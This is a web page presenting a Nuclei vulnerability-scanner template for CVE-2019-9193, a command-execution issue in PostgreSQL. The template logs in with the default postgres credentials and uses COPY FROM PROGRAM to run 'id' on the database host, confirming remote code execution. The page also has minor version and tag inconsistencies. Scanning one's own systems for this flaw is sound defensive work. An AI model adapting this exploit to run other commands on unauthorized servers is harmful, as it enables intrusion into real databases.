PostgreSQL 9.3-12.3 Authenticated Remote Code Execution

ID: CVE-2019-9193

Severity: high

Author: pussycat0x

Tags: cve,cve2018,js,network,postgresql,intrusive

Description

In PostgreSQL 9.3 through 11.2, the “COPY TO/FROM PROGRAM” function allows superusers and users in the ‘pg_execute_server_program’ group to execute arbitrary code in the context of the database’s operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.

YAML Source

id: CVE-2019-9193

info:
  name: PostgreSQL 9.3-12.3 Authenticated Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/postgres/CVE-2019-9193
  metadata:
    verified: true
    max-request: 1
    shodan-query: "product:\"PostgreSQL\""
  tags: cve,cve2018,js,network,postgresql,intrusive

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      const postgres = require('nuclei/postgres');
      const client = new postgres.PGClient;
      const tbl = tbl_exec
      const qry = ["CREATE TABLE "+tbl+"(cmd_output text);", "COPY "+tbl + " FROM PROGRAM 'id';", "SELECT * FROM "+ tbl+";", "DROP TABLE IF EXISTS " +tbl+";",];
      for (const x of qry){
        connected =  client.ExecuteQuery(Host, Port, User, Pass, Db, x);
        Export(connected);
      }

    args:
      Host: "{{Host}}"
      Port: 5432
      User: "{{usernames}}"
      Pass: "{{password}}"
      Db: "{{database}}"
      tbl_exec: "{{randbase(5)}}"

    payloads:
      usernames:
        - postgres
      database:
        - postgres
      password:
        - postgres

    attack: clusterbomb

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"

      - type: word
        words:
          - "cmd_output"
# digest: 4b0a00483046022100ce439b628e4c6bf983fc5344bfa8846f824b547245943f2baf520b549193041b022100a99a6d5705530c714ff4040f222306292aa3649798b292f89ca81b4825cb7398:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "javascript/cves/2019/CVE-2019-9193.yaml"

View on Github